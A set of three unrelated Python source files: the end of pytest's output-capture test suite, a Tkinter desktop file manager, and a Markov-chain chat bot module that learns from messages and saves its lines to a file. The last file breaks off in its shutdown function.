except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
# about UnicodeDecodeError, see note on pytester
pytest.skip("could not run 'lsof' ({!r})".format(exc))
yield
out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture:
pytestmark = needsosdup
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
s = cap.snap()
cap.done()
assert not s
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(ValueError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile):
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2)
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AttributeError, cap.suspend)
def test_capfd_sys_stdout_mode(self, capfd):
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
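# Added note: saved_fd duplicates the original descriptor up front and dup2()s it
# back on exit, so tests that capture fd 1/2 directly (like test_simple_resume_suspend
# above) leave the real stdout/stderr file descriptors intact afterwards.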
class TestStdCapture:
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hxąć")
out, err = cap.readouterr()
assert out == "hxąć\n"
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(IOError, sys.stdin.read)
class TestTeeStdCapture(TestStdCapture):
captureclass = staticmethod(TeeStdCapture)
def test_capturing_error_recursive(self):
""" for TeeStdCapture since we passthrough stderr/stdout, cap1
should get all output, while cap2 should only get "cap2\n" """
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\ncap2\n"
assert out2 == "cap2\n"
class TestStdCaptureFD(TestStdCapture):
pytestmark = needsosdup
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile(
"""\
import os
def test_x():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
pytestmark = needsosdup
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile(
"""
import os
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert repr(cap.out) == "<FDCapture 1 oldfd=None _state=None>"
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert repr(cap.err) == "<FDCapture 2 oldfd=None _state=None>"
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
assert repr(cap.in_) == "<FDCapture 0 oldfd=None _state=None>"
cap.stop_capturing()
"""
)
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
@needsosdup
@pytest.mark.parametrize("use", [True, False])
def test_fdcapture_tmpfile_remains_the_same(tmpfile, use):
if not use:
tmpfile = True
cap = StdCaptureFD(out=False, err=tmpfile)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
@needsosdup
def test_close_and_capture_again(testdir):
testdir.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize("method", ["SysCapture", "FDCapture", "TeeSysCapture"])
def test_capturing_and_logging_fundamentals(testdir, method):
if method == "StdCaptureFD" and not hasattr(os, "dup"):
pytest.skip("need os.dup")
# here we check a fundamental feature
p = testdir.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(out=False, in_=False,
Capture=capture.%s)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
result = testdir.runpython(p)
result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "strict"
assert sys.stderr.errors == "strict"
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win") and sys.version_info[:2] >= (3, 6),
reason="only py3.6+ on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams():
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream:
def write(self, s):
pass
stream = DummyStream()
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
p = testdir.makepyfile(
"""
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
# Do not consider plugins like hypothesis, which might output to stderr.
testdir.monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
result = testdir.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
result.stdout.no_fnmatch_line("*IOError*")
def test_pickling_and_unpickling_encoded_file():
# See https://bitbucket.org/pytest-dev/pytest/pull-request/194
# pickle.loads() raises infinite recursion if
# EncodedFile.__getattr__ is not implemented properly
ef = capture.EncodedFile(None, None)
ef_as_str = pickle.dumps(ef)
pickle.loads(ef_as_str)
def test_global_capture_with_live_logging(testdir):
# Issue 3819
# capture should work with live cli logging
# Teardown report seems to have the capture for the whole process (setup, capture, teardown)
testdir.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
testdir.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog", "r") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout", "r") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
# Issue 3819
# capture should work with live cli logging
testdir.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
"""It should behave the same with and without output capturing (#4861)."""
p = testdir.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = testdir.runpytest("-s", str(p))
result_with_capture = testdir.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
result_with_capture.stdout.fnmatch_lines(
["E * TypeError: write() argument must be str, not bytes"]
)
def test_stderr_write_returns_len(capsys):
"""Write on Encoded files, namely captured stderr, should return number of characters written."""
assert sys.stderr.write("Foo") == 3
def test_encodedfile_writelines(tmpfile: BinaryIO) -> None:
ef = capture.EncodedFile(tmpfile, "utf-8")
with pytest.raises(AttributeError):
ef.writelines([b"line1", b"line2"]) # type: ignore[list-item] # noqa: F821
assert ef.writelines(["line1", "line2"]) is None # type: ignore[func-returns-value] # noqa: F821
tmpfile.seek(0)
assert tmpfile.read() == b"line1line2"
tmpfile.close()
with pytest.raises(ValueError):
ef.read()
|
main.py
|
import os
from ui.button import Button
from tkinter import BooleanVar, Entry, Frame, PanedWindow, StringVar, Toplevel
from app import App
root = App('File Manager using Tkinter')
root.grid_rowconfigure(1, weight=1)
root.grid_columnconfigure(0, weight=1)
# <header>
from toolbar import Toolbar
header = Toolbar(root, height=32, bg='#fff')
header.grid(row=0, column=0, sticky='ew')
# </header>
# <body>
body = PanedWindow(root, sashwidth=2, bd=0)
# <body-sidebar>
from ui.images import (desktop, documents, downloads, gallery, home, music,
videos)
folders = [
(home, 'Home'),
(desktop, 'Desktop'),
(documents, 'Documents'),
(downloads, 'Downloads'),
(music, 'Music'),
(gallery, 'Pictures'),
(videos, 'Videos')
]
from sidebar import Sidebar
sidebar = Sidebar(body, '#D9D9D9', 'orange', folders)
body.add(sidebar)
# </body-sidebar>
import os
from os.path import isdir, join as joinpath
from platform import system
from subprocess import call as file_call
from ui.frame_stack import FrameStack
if system() == 'Windows':
def open_file(filepath):
if isdir(filepath):
draw_files(filepath)
else:
os.startfile(filepath)
else:
def open_file(filepath):
if isdir(filepath):
draw_files(filepath)
else:
file_call(('xdg-open', filepath))
from datetime import datetime
utc = datetime.utcfromtimestamp
from glob import glob
def draw_files(dir):
if dir == joinpath(path := os.path.expanduser('~'), 'Home'):
os.chdir(path)
print(f'Raised {dir}')
content.raise_frame(path)
return
os.chdir(dir)
if dir in content.frames:
print(f'Raised {dir}')
content.raise_frame(dir)
return
content.push(ScrollableFrame, dir)
r = 0
for name in glob('*'):
file_path = joinpath(dir, name)
size = f'{os.path.getsize(file_path)} Bytes'
mtime = utc(os.path.getmtime(file_path))
mtime = mtime.date()
icon_type = 'dir' if isdir(file_path) else 'file'
ListLabel(content.frames[dir].window, icon_type, name, mtime, size)\
.grid(row=r, column=0, sticky='ew')
r += 1
print(dir, r)
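# Added note: draw_files keeps one ScrollableFrame per visited directory in
# content.frames, so revisiting a folder only raises the cached frame instead of
# listing the directory again.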
# <body-content>
os.chdir(os.path.expanduser('~'))
from threading import Thread
from ui.list_label import ListLabel
from ui.scrollable_frame import ScrollableFrame
cbody = Frame(root)
cbody.grid_columnconfigure(0, weight=1)
cbody.grid_rowconfigure(1, weight=1)
ListLabel(cbody, None, 'Name', 'Modified', 'Size', bg="#999")\
.grid(sticky='ew', row=0, column=0)
content = FrameStack(cbody)
content.grid(sticky='nsew', row=1, column=0)
Thread(target=draw_files, args=[os.getcwd()], daemon=True).start()
body.add(cbody)
# </body-content>
body.paneconfig(sidebar, minsize=210)
body.grid(sticky='nsew', row=1, column=0, pady=(1, 0))
# </body>
body.bind_class('SidebarLabel',
'<Button-1>',
lambda e:
Thread(target=draw_files, daemon=True, args=[joinpath(
os.path.expanduser('~'), e.widget.cget('text'))]
).start(),
add=True)
def double_clicked(event):
name = event.widget.master.name
Thread(target=open_file, args=[joinpath(
os.getcwd(), name)], daemon=True).start()
def enable_buttons(*buttons):
global cutcopy
for button in header.winfo_children()[1:]:
button.config(state='disabled')
if buttons[0] is None:
return
for button in buttons:
button.config(state='normal')
body.bind_class('ListLabel', '<Double-Button-1>', double_clicked)
body.bind_class('ListLabel', '<Button-1>', ListLabel.change_current)
body.bind_class('ListLabel', '<Button-1>', lambda e:
enable_buttons(header.cut, header.copy, header.rename, header.delete) if cutcopy.get() not in ('cut', 'copy') else None, add=True)
body.bind_class('SidebarLabel', '<Button-1>',
lambda e: enable_buttons(None) if cutcopy.get() not in ('cut', 'copy') else None, add=True)
from tkinter.messagebox import askyesno
from send2trash import send2trash
F = StringVar(root, value=None)
cutcopy = StringVar(root, value=None, name='cutcopy')
curr = None
from tkinter import messagebox
def create_folder():
dialog = Toplevel(root)
dialog.title("New Folder")
dialog.transient(root)
dialog.resizable(False, False)
foldername = StringVar(root)
sure = BooleanVar(root, value=False)
def yes():
sure.set(True)
try:
os.mkdir(joinpath(os.getcwd(), foldername.get()))
dialog.destroy()
except FileExistsError:
messagebox.showerror("Folder already exists!",
"A folder with same name is already present in the current directory. Try entering another name")
except FileNotFoundError:
messagebox.showerror("Invalid Name!",
"A folder with same name is already present in the current directory. Try entering another name")
Entry(dialog, textvariable=foldername).pack(padx=5, pady=(5, 0))
Button(dialog, text='CREATE', command=yes).pack(
side='right', padx=5, pady=5)
dialog.grab_set()
root.wait_window(dialog)
dialog.grab_release()
    if sure.get():
        stat = os.stat(joinpath(os.getcwd(), foldername.get()))
        r = len(os.listdir())
        ListLabel(content.frames[os.getcwd()].window, 'dir', foldername.get(),
                  datetime.utcfromtimestamp(stat.st_mtime), stat.st_size)\
            .grid(row=r + 1, column=0, sticky='ew')
header.newfolder.config(command=create_folder)
def cut():
F.set(joinpath(os.getcwd(), ListLabel.currently_selected.name))
global curr
curr = ListLabel.currently_selected
cutcopy.set('cut')
enable_buttons(header.paste)
header.cut.config(command=cut)
def copy():
F.set(joinpath(os.getcwd(), ListLabel.currently_selected.name))
global curr
curr = ListLabel.currently_selected
cutcopy.set('copy')
enable_buttons(header.paste)
header.copy.config(command=copy)
from shutil import copyfile
def paste():
action = cutcopy.get()
cutcopy.set(None)
enable_buttons(None)
if os.getcwd() == os.path.dirname(F.get()):
return
if action == 'cut':
global curr
curr.destroy()
curr = None
(copyfile if action == 'copy' else os.rename)(
F.get(), joinpath(os.getcwd(), os.path.basename(F.get())))
ListLabel.currently_selected = None
    dest = joinpath(os.getcwd(), os.path.basename(F.get()))
    stat = os.stat(dest)
    s = stat.st_size
    t = stat.st_mtime
    r = len(os.listdir())
    ListLabel(content.frames[os.getcwd()].window, 'dir' if isdir(dest) else 'file',
              os.path.basename(dest), datetime.utcfromtimestamp(t), f'{s} Bytes')\
        .grid(row=r + 1, column=0, sticky='ew')
header.paste.config(command=paste)
def delete_file():
F.set(joinpath(os.getcwd(), ListLabel.currently_selected.name))
sure = askyesno(
'Confirmation', 'Are you sure you want to delete this?')
if sure:
send2trash(F.get())
ListLabel.currently_selected.destroy()
ListLabel.currently_selected = None
header.delete.config(command=delete_file)
def rename_file():
F.set(joinpath(os.getcwd(), ListLabel.currently_selected.name))
src, ext = os.path.splitext(os.path.basename(F.get()))
dialog = Toplevel(root)
dialog.title("Rename")
dialog.transient(root)
dialog.resizable(False, False)
newname = StringVar(root)
sure = BooleanVar(root, value=False)
def yes():
try:
if src == newname.get():
dialog.destroy()
return
newfile = joinpath(os.getcwd(), f'{newname.get()}{ext}')
i = 1
while os.path.exists(newfile):
newfile = joinpath(os.getcwd(), f'{newname.get()}{i}{ext}')
i += 1
os.rename(F.get(), newfile)
newname.set(os.path.basename(newfile))
sure.set(True)
dialog.destroy()
except IsADirectoryError:
messagebox.showerror("Error",
"A folder with same name already exists")
Entry(dialog, textvariable=newname).pack(padx=5, pady=(5, 0))
Button(dialog, text='OK', command=yes).pack(
side='right', padx=5, pady=5)
dialog.grab_set()
root.wait_window(dialog)
dialog.grab_release()
if sure.get():
ListLabel.currently_selected.winfo_children()[1]\
.config(text=newname.get())
ListLabel.currently_selected.name = newname.get()
header.rename.config(command=rename_file)
root.bind('<Control-Shift-n>', lambda e: header.newfolder.invoke())
root.bind('<Control-Shift-N>', lambda e: header.newfolder.invoke())
root.bind('<Control-x>', lambda e: header.cut.invoke())
root.bind('<Control-X>', lambda e: header.cut.invoke())
root.bind('<Control-c>', lambda e: header.copy.invoke())
root.bind('<Control-C>', lambda e: header.copy.invoke())
root.bind('<Control-v>', lambda e: header.paste.invoke())
root.bind('<Control-V>', lambda e: header.paste.invoke())
root.bind('<Delete>', lambda e: header.delete.invoke())
root.bind('<F2>', lambda e: header.rename.invoke())
root.mainloop()
|
markov.py
|
from . import config
from . import derpymodel
import importlib
import re
import random
import time
import threading
import markovify
import os
import common
from collections import defaultdict
version = '0.9.3.14'
model = None
unsaved = False
lines = list()
test_kwargs = {'max_overlap_ratio': config.max_overlap_ratio,
'max_overlap_total': config.max_overlap_total,
'test_output': config.test_output}
if config.sentence_max_words > 0:
test_kwargs['max_words'] = config.sentence_max_words
uri_regex = re.compile(r"[^\s]*:\/\/[^\s]*")
emoticon_regex = re.compile(r":[DPO]|D:|[Xx]D|[Oo][_-][Oo]")
hashtag_user_regex = re.compile(r"^[@#][^\s]*")
commands = defaultdict(dict)
shutting_down = False
unique_words = set()
unique_word_count = 0
line_count = 0
word_count = 0
context_count = 0
console_prefix = "[DerpyMarkov] "
doing_chain = False
save_lock = threading.Lock()  # module-level lock so concurrent saves cannot interleave file writes
def reload():
importlib.reload(config)
def accepting_input():
    return not shutting_down
def activate(reload):
"""
Load and initialize everything then get markov running.
"""
global model, lines, main_dictionary_file, shutting_down, doing_chain
shutting_down = False
doing_chain = False
    if reload:
        importlib.reload(config)  # the parameter shadows the module-level reload(), so reload config directly
common.console_print("DerpyMarkov version " + version, console_prefix)
common.console_print("Loading main dictionary...", console_prefix)
input_text = common.text_file_read(config.main_dictionary_file)
if input_text == '':
input_text = 'derp'
model = derpymodel.DerpyText(input_text, state_size = config.state_size1)
lines = generate_lines_from_model(True)
get_statistics(True, False)
common.console_print("Normal reply rate is " + str(config.reply_rate) + " and bot name reply rate is " + str(config.bot_name_reply_rate) + ".", console_prefix)
common.console_print("The save interval is " + str(config.save_interval) + " seconds.", console_prefix)
del input_text
setup_commands()
def get_statistics(print_to_console, return_formatted):
"""
Gets a dict of various statistics and returns them.
print: If True, we print the statistics to console as well.
"""
update_stats()
stats = {}
stats['line_count'] = line_count
stats['word_count'] = word_count
stats['unique_word_count'] = unique_word_count
stats['state_size'] = model.state_size
stats['context_count'] = context_count
output = []
output.append("I know " + str(line_count) + " lines containing a total of " + str(word_count) + " words.")
output.append(str(unique_word_count) + " of those words are unique.")
output.append("We are currently using a state size of " + str(model.state_size) + " which generated " + str(context_count) + " contexts.")
if print_to_console:
for entry in output:
common.console_print(entry, console_prefix)
if return_formatted:
return "\n".join(output)
return stats
def setup_commands():
global commands
commands['statistics']['description'] = 'List statistics for markov instance'
commands['version']['description'] = 'Get current version'
def get_command_list():
return commands
def incoming_console_command(command):
if not accepting_input():
return
if command == 'shutdown':
shutdown()
if command == 'statistics':
get_statistics(True, False)
if command == 'version':
common.console_print("derpymarkov " + version, console_prefix)
def incoming_message_command(command):
if not accepting_input():
return None
if command == 'statistics':
stats = get_statistics(False, True)
return stats
if command == 'version':
return "derpymarkov version: " + version
return None
def incoming_message(message, client_name, bot_paged, do_learn):
"""
The primary input function. At present any content from outside classes or
modules comes through here. A reply is returned if warranted, otherwise
returns None.
message: The content being passed to DerpyMarkov. Should be a string.
client_name: The current name of the client sending content.
"""
global doing_chain
if not accepting_input():
return None
    if not isinstance(message, str) or message == "":
return None
while doing_chain:
time.sleep(0.05)
make_reply = False
reply = None
split_message = message.split()
filtered_split = list()
name_fold = client_name.casefold()
for index, word in enumerate(split_message):
word_fold = word.casefold()
# Check if bot was named in message; if so, remove name and indicate bot was paged
if word_fold != name_fold and word_fold != "@" + name_fold:
filtered_split.append(word)
else:
bot_paged = True
prepared_message = prepare_message(" ".join(filtered_split))
if prepared_message == "":
return None
if do_learn:
learn(prepared_message)
reply_rand = random.uniform(0, 100.0)
if bot_paged:
make_reply = reply_rand <= config.bot_name_reply_rate
else:
make_reply = reply_rand <= config.reply_rate
if make_reply:
doing_chain = True
reply = compose_reply(prepared_message)
doing_chain = False
return reply
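# A minimal usage sketch (added illustration, never called from this module): it
# assumes `config` and `common` are wired up as above and uses placeholder
# message/client names.
def _example_usage():
    activate(False)  # build the model from the main dictionary without reloading config
    reply = incoming_message("hello there", "DerpyBot", bot_paged=True, do_learn=True)
    if reply is not None:
        common.console_print(reply, console_prefix)
    shutdown()  # saves any unsaved lines and stops the timed save loop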
def prepare_message(message):
"""
    Do some filtering on the raw message before sending it to the markov
chain.
"""
message = message.replace('"', '')
split_message = message.split()
if not config.preserve_case:
# Check for case-sensitive things such as URIs and preserve them
for index, substring in enumerate(split_message):
if not uri_regex.match(substring)\
and not emoticon_regex.match(substring)\
and not hashtag_user_regex.match(substring):
split_message[index] = substring.lower()
filtered_message = ' '.join(split_message)
return filtered_message
def choose_key_phrase(words):
"""
Used to derive a keyword or phrase from the given text.
words: Input text to be used for key words or phrases.
"""
wordlist = model.word_split(words)
index = random.randint(0, len(wordlist))
key_phrase = wordlist[index - 1]
return key_phrase
def get_sentence(words, key_phrase):
"""
We generate sentences here and return them. Starts with the basic
make_sentence and checks for any keywords (or returns the sentence if
keywords are disabled). This gives the nicest results but tends to fail
for words that are uncommon in a dictionary
If the first method fails we attempt making a sentence with a starting
key word which has a better rate of success but the possible responses
are more limited and can feel repetitive if everything was done this way.
words: Input text to be used for key words or phrases.
key_phrase: A specific keyword or phrase can be sent for use instead.
"""
    wordlist = []
    if config.use_keywords:
        if config.try_all_words_for_key:
            wordlist = model.word_split(words)
            random.shuffle(wordlist)
        elif key_phrase is not None:
            # Wrap the single key phrase so the loops below iterate over phrases,
            # not over individual characters.
            wordlist = [key_phrase]
counter = 0
final_sentence = None
while counter < config.sentence_with_key_tries:
counter += 1
try:
attempt = model.make_sentence(tries = 1, **test_kwargs)
except KeyError as error:
attempt = None
if attempt is not None:
if config.use_keywords:
if final_sentence is None:
for word in wordlist:
if re.search(r'\b' + re.escape(word) + r'\b', attempt, re.IGNORECASE) is not None:
final_sentence = attempt
break
else:
final_sentence = attempt
break
if final_sentence is None:
try:
for word in wordlist:
final_sentence = model.make_sentence_with_start(word, strict = False, **test_kwargs)
if final_sentence is not None:
break
except (KeyError, markovify.text.ParamError) as error:
final_sentence = None
if final_sentence is not None:
final_sentence = clean_up_punctuation(final_sentence)
return final_sentence
def clean_up_punctuation(sentence):
sentence_fragments = model.word_split(sentence)
unmatched_open = -1
unmatched_close = -1
for index, fragment in enumerate(sentence_fragments, start = 1):
if '(' in fragment:
unmatched_open = index - 1
if ')' in fragment:
if unmatched_open != -1:
unmatched_open = -1
else:
unmatched_close = index - 1
if unmatched_open != -1:
if len(sentence_fragments) > unmatched_open + 1:
random_index = random.randrange(unmatched_open + 1, len(sentence_fragments))
        else:
            random_index = len(sentence_fragments) - 1
sentence_fragments[random_index] = sentence_fragments[random_index] + ')'
if unmatched_close != -1:
if unmatched_close < 2:
sentence_fragments[unmatched_close] = '(' + sentence_fragments[unmatched_close]
else:
random_index = random.randrange(0, unmatched_close - 1)
sentence_fragments[random_index] = sentence_fragments[random_index] + '('
sentence = ' '.join(sentence_fragments)
return sentence
def compose_reply(message):
key_phrase = None
sentence = None
if config.use_keywords:
key_phrase = choose_key_phrase(message)
sentence = get_sentence(message, key_phrase)
reply = sentence
if reply == message:
reply = ""
return reply
def learn(text):
"""
Come here for some edumacation!
text: Content to be learned.
"""
global model, unsaved
if not config.learn:
return
unsaved = True
parsed_sentences = list(model.generate_corpus(text))
lines.extend(list(map(model.word_join, parsed_sentences)))
if config.update_stats_on_learn:
update_stats(parsed_sentences)
new_model = derpymodel.DerpyText(text, state_size = config.state_size1)
model = markovify.combine([ model, new_model ])
def update_stats(parsed_sentences = None):
global line_count, context_count, word_count, unique_words, unique_word_count
if parsed_sentences is None:
word_count = 0
parsed_sentences = model.parsed_sentences
    for sentence in parsed_sentences:
for word in sentence:
word_count += 1
unique_words.add(word)
line_count = len(lines)
context_count = len(model.chain.model)
unique_word_count = len(unique_words)
def generate_lines_from_model(sort):
lines = list(map(model.word_join, model.parsed_sentences))
if sort:
return sorted(lines)
else:
return lines
def save():
"""
Writes the current lines to file. If no changes have been detected since
last save we don't need to do anything.
"""
global unsaved
if not unsaved:
return
common.console_print("Saving lines...", console_prefix)
if os.path.exists(config.main_dictionary_file) and not os.path.isfile(config.main_dictionary_file):
common.console_print("Error! " + config.main_dictionary_filename + " exists but is not a valid file. Cannot save lines.", console_prefix)
return
if not os.path.exists(config.main_dictionary_file):
os.makedirs(config.absolute_dictionary_directory, exist_ok = True)
common.console_print(config.main_dictionary_filename + " was not found. Creating new file...", console_prefix)
    with save_lock:
        with open(config.main_dictionary_file, 'w', encoding = "utf8") as text:
            text.write('\n'.join(sorted(lines)))
common.console_print("Lines saved!", console_prefix)
unsaved = False
def shutdown():
"""
Let's do a clean shutdown here.
"""
global model, shutting_down
shutting_down = True
